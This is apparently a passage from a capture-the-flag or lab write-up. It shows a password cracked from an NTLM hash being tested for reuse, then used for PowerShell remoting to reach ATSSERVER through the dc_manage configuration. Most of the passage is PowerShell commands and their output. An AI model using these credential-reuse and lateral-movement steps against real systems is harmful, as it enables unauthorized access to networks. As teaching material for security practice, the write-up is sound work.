awallace
Upon successfully compromising the Acute-PC01 host, I obtained the system hashes by leveraging administrator privileges. Subsequently, a single NTLM hash was successfully cracked, and this password will be subjected to testing for potential password reuse on the ATSSERVER host.
PS C:\Users\jmorgan\Documents> $Cred = New-Object System.Management.Automation.PSCredential("ACUTE.LOCAL\awallace", (ConvertTo-SecureString "Password@123" -AsPlainText -Force))Creating a PSCredential object for the awallace user with the cracked password
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {whoami}
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more
information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\Users\jmorgan\Documents> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
acute\awallaceThe password is confirmed to belong to the awallace user while the user is still bound by the dc_manage configuration rule
Lateral Movement made to the ATSSERVER host as the awallace user